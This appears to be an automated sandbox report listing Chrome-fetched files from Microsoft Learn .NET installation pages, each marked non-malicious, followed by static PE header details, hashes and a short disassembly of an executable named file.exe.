                                                                                                                                                                                                                      URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                                                                                                                                                      Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:HMB:k
                                                                                                                                                                                                                      MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                                                                      SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                                                                      SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                                                                      SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                                                                      Preview:CgkKBw2/5iXyGgA=
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1301x300, components 3
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):33370
                                                                                                                                                                                                                      Entropy (8bit):7.973675198531228
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:ykeIpO37gQNPfG0sxFrlSvg0EliJBectySxPMmPOGTeou78:ykX0DP+TFgg3iJNyyfPO9N78
                                                                                                                                                                                                                      MD5:6E78EE324E008296108BFCDECD77E318
                                                                                                                                                                                                                      SHA1:F7C39EE02C65BCEB2C66AD2D7F45523FEB5AD156
                                                                                                                                                                                                                      SHA-256:EB7A4FF0F8ED4C8A95B2183968B5A59F4058B177F580AE2D2BEF4595B6F6E092
                                                                                                                                                                                                                      SHA-512:BCFFF936BCC46AB4120690CFF3AF93491080E13084EA2BCD8BCE1A2470EA86EB007D695AEF23B73E0B84CB3C7FBF351D025BE47EC5D232AB613A420074F8A448
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}......,....!..........6.....................................................................S..d+!XYd..Hb..1..IR.BA0.+!....$C...@I..bU.BH%.1K..A...%...1h.3.,..+0F!Z@....`..%!.o...._]..=......J./Uz.k..._m..}..,s.lV.ED...J...,..b.........Y....u...N..g......A*.$"3!h.~`>.....d+.,.a).Rb.*I...D,."...IXJ..$.A$BU...bA,.`Z.b..,c...KFf.0.B;.f..U.C ..V.X,e.,1t}.....k.:R..b.l....mt.....#..W...iY..d..#.HU$..1...GW%..d]..-.x.:.......&...o.......(h.+.)h..x.?.B....,.D$.0.R.Y.%.."B#E$.$..!..K)0.....X.X.,.1..3BHbAxX.....R.]...1..(..`..VX.2..L.s.......L....]xVU^..Q.v>.I......7I.fJ....+vJ.T0V..z.]....}.J..A...,.~?...+....]...y.|. .H..fFh..l.?.....Yd.IHJ.V...K..F....IS.H...%..K....X.....,C...f..F..$...+..8WdV!]..,.U..p!.A..|Vw.x_I.,$!!...i...2..7.l_...'....}.q..{..z.F........vm/.V.........9..F..dh..;..$..BT.G0O.G.......B.$RJ.Z,,.0%..
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):13339
                                                                                                                                                                                                                      Entropy (8bit):7.683569563478597
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                                                      MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                                                      SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                                                      SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                                                      SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                                                                                                                      Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):17174
                                                                                                                                                                                                                      Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                                      MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                                      SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                      SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                      SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                                                                      Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):1817143
                                                                                                                                                                                                                      Entropy (8bit):5.501007973622959
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                                                      MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                                                      SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                                                      SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                                                      SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      URL:https://learn.microsoft.com/static/assets/0.4.028726178/scripts/en-us/index-docs.js
                                                                                                                                                                                                                      Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5644
                                                                                                                                                                                                                      Entropy (8bit):4.785769732002188
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                                                      MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                                                      SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                                                      SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                                                      SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):17174
                                                                                                                                                                                                                      Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                                      MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                                      SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                                      SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                                      SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):13842
                                                                                                                                                                                                                      Entropy (8bit):7.802399161550213
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                                                      MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                                                      SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                                                      SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                                                      SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                                                                      Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):33148
                                                                                                                                                                                                                      Entropy (8bit):4.917595394577667
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                                                      MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                                                      SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                                                      SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                                                      SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                      Entropy (8bit):7.949347406764243
                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                      File name:file.exe
                                                                                                                                                                                                                      File size:1'842'688 bytes
                                                                                                                                                                                                                      MD5:ff1c291b46fb3ada2bdb55ba4c14bcfe
                                                                                                                                                                                                                      SHA1:875c6f3b14c117f3429771d5e8d82ee667c8fed6
                                                                                                                                                                                                                      SHA256:75c752bb2e5ff68a9689fa43bc6a9e408834ebc40a50725e6ca31fc26553af0e
                                                                                                                                                                                                                      SHA512:ec8ff21cd6e26186ddfe4985040e058161257a24d0569c8074df99f71027467faba7353b26767664a1104abae0794eaa5b95391bb4cd721eadc6fc4a36241ea4
                                                                                                                                                                                                                      SSDEEP:49152:veJstCliii7ZFFcB1YwHDOUPeQ1dm+TL36/GKwKT2Zb8I0u8LN:GGtClit73FcB1Y2zPeQ1d93UUKT2Zns
                                                                                                                                                                                                                      TLSH:A1853328A5D322B6CCF629F84E839AE271E97D747DB0D9CC458F325741220E5A17EC87
                                                                                                                                                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....r;g.............................pI...........@...........................I.....V~....@.................................\p..p..
                                                                                                                                                                                                                      Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                      Entrypoint:0x897000
                                                                                                                                                                                                                      Entrypoint Section:.taggant
                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                      Time Stamp:0x673B72E6 [Mon Nov 18 17:01:26 2024 UTC]
                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                      jmp 00007FE9053584EAh
                                                                                                                                                                                                                      paddb mm3, qword ptr [ebx]
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add cl, ch
                                                                                                                                                                                                                      add byte ptr [eax], ah
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [ebx], al
                                                                                                                                                                                                                      or al, byte ptr [eax]
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], dl
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [ebx], cl
                                                                                                                                                                                                                      or al, byte ptr [eax]
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [ebx], al
                                                                                                                                                                                                                      or al, byte ptr [eax]
                                                                                                                                                                                                                      add byte ptr [ebx], cl
                                                                                                                                                                                                                      or al, byte ptr [eax]
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [ecx], al
                                                                                                                                                                                                                      add byte ptr [eax], 00000000h
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      adc byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      or ecx, dword ptr [edx]
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x5705c0x70.idata
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x571f80x8.idata
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
